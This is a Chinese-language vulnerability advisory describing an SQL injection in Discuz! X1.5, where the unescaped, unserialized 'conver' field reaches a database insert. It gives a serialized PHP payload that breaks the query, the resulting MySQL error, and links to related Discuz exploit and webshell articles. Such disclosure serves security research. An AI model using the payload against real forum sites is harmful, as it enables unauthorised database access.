发布日期:2011-04.26
发布作者:Jannock
影响版本:DiscuzX1.5
官方网址:http://www.discuz.net
漏洞类型:SQL注入
详细说明:
source\include\portalcp\portalcp_article.php
//90行
if($_G[''gp_conver'']) {
$converfiles = unserialize(stripcslashes($_G[''gp_conver'']));
$setarr[''pic''] = $converfiles[''pic''];
$setarr[''thumb''] = $converfiles[''thumb''];
$setarr[''remote''] = $converfiles[''remote''];
}
可以看出变量 $converfiles 没有 addcslashes。
$aid = DB::insert(''portal_article_title'', $setarr, 1); //122行
进入数据库查询,因此存在SQL注射BUG。
漏洞证明:
有 门户 › 门户管理 › 频道栏目 发表权限。
发表文章:
http://localhost:9998/portal.php?mod=portalcp&ac=article&catid=1
在firebug下显示conver表单。
填上:a:3:{s:3:"pic";s:3:"xx''";s:5:"thumb";s:2:"xx";s:6:"remote";s:2:"xx";}
提交即暴错。
Error messages:
* [Type] 查询语句错误
* [1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''xx'',`remote`=''xx'',`uid`=''1'',`username`=''admin'',`id`=''0'''' at line 1
* [Query] INSERT INTO portal_article_title SET `title`=''xxxxxxxx'',`shorttitle`='''',`author`='''',`from`='''',`fromurl`='''',`dateline`=''1301158320'',`url`='''',`allowcomment`=''1'',`summary`=''xxxxxxxxxxxxxxxx'',`prename`='''',`preurl`='''',`catid`=''1'',`tag`=''0'',`status`=''0'',`pic`=''xx'''',`thumb`=''xx'',`remote`=''xx'',`uid`=''1'',`username`=''admin'',`id`=''0''
只显示10条记录相关文章
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22311, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16904, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14460, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46369, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50181, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15973, 评论: 0)
dz~~~~马后炮 (浏览: 10675, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11777, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18647, 评论: 0)